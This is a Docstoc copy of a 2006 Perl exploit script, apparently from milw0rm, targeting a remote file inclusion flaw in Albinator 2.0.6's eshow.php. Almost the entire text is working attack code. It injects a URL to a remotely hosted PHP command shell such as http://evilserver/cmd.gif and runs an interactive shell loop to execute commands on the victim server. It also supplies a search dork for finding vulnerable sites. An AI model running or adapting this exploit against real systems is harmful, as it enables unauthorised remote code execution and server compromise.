Docstoc

Albinator 2.0.6 Config_rootdir Remote File Inclusion Exploit

Document Sample
Albinator 2.0.6 Config_rootdir Remote File Inclusion Exploit Powered By Docstoc
					                         Albinator 2.0.6 Config_rootdir Remote File Inclusion Exploit                                        Page 1/2
  1    #!/usr/bin/perl
  2    ##
  3    #Albinator Multiple Parameter File Inclusion
  4    # Bug discovered by VietMafia and r0t
  5    # code copier: webDEViL w3bd3vil[at]gmail.com
  6    #code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
  7    #Dork:"powered by Albinator "
  8    # usage:
  9    # perl wb.pl <target> <cmd shell location> <cmd shell variable>
  10   # perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd
  11   # cmd shell example: <?system($cmd);?>
  12   # cmd shell variable: ($_GET[cmd]);
  13
  14   use LWP::UserAgent;
  15
  16   $Path = $ARGV[0];
  17   $Pathtocmd = $ARGV[1];
  18   $cmdv = $ARGV[2];
  19
  20   if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
  21
  22   head();
  23
  24   while()
  25   {
  26         print "[shell] \$";
  27   while(<STDIN>)
  28         {
  29                  $cmd=$_;
  30                  chomp($cmd);
  31
  32   $xpl = LWP::UserAgent−>new() or die;
  33   $req = HTTP::Request−>new(GET =>$Path.’eshow.php?Config_rootdir=’.$Pathtocmd.’?&’.$cmdv.’=’.$cmd)or die "\nCould Not connect\n";

  34   ## can change eshow.php to eday.php or forgot.php
  35
  36   $res = $xpl−>request($req);
  37   $return = $res−>content;
  38   $return =~ tr/[\n]/[ê]/;
  39
  40   if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
  41
  42   elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/
       )
  43         {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
  44   elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
  45
  46   if($return =~ /(.*)/)
  47
  48   {
  49         $finreturn = $1;
  50         $finreturn=~ tr/[ê]/[\n]/;
webDEViL                                                                                                                      05/03/2006
                           Albinator 2.0.6 Config_rootdir Remote File Inclusion Exploit               Page 2/2
  51         print "\r\n$finreturn\n\r";
  52         last;
  53   }
  54
  55   else {print "[shell] \$";}}}last;
  56
  57   sub head()
  58    {
  59    print "\n============================================================================\r\n";
  60    print " Albinator Multiple Parameter File Inclusion\r\n";
  61    print "============================================================================\r\n";
  62    }
  63   sub usage()
  64    {
  65    head();
  66    print " Usage: perl wb.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
  67    print " <Site> − Full path to Albinator ex: http://www.site.com/ \r\n";
  68    print " <cmd shell> − Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
  69    print " <cmd variable> − Command variable used in php shell \r\n";
  70    print "============================================================================\r\n";
  71    print "                webDEViL w3bd3vil[at]gmail.com \r\n";
  72    print "============================================================================\r\n";
  73    exit();
  74    }
  75
  76   # milw0rm.com [2006−05−03]




webDEViL                                                                                              05/03/2006

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:144
posted:5/23/2010
language:English
pages:2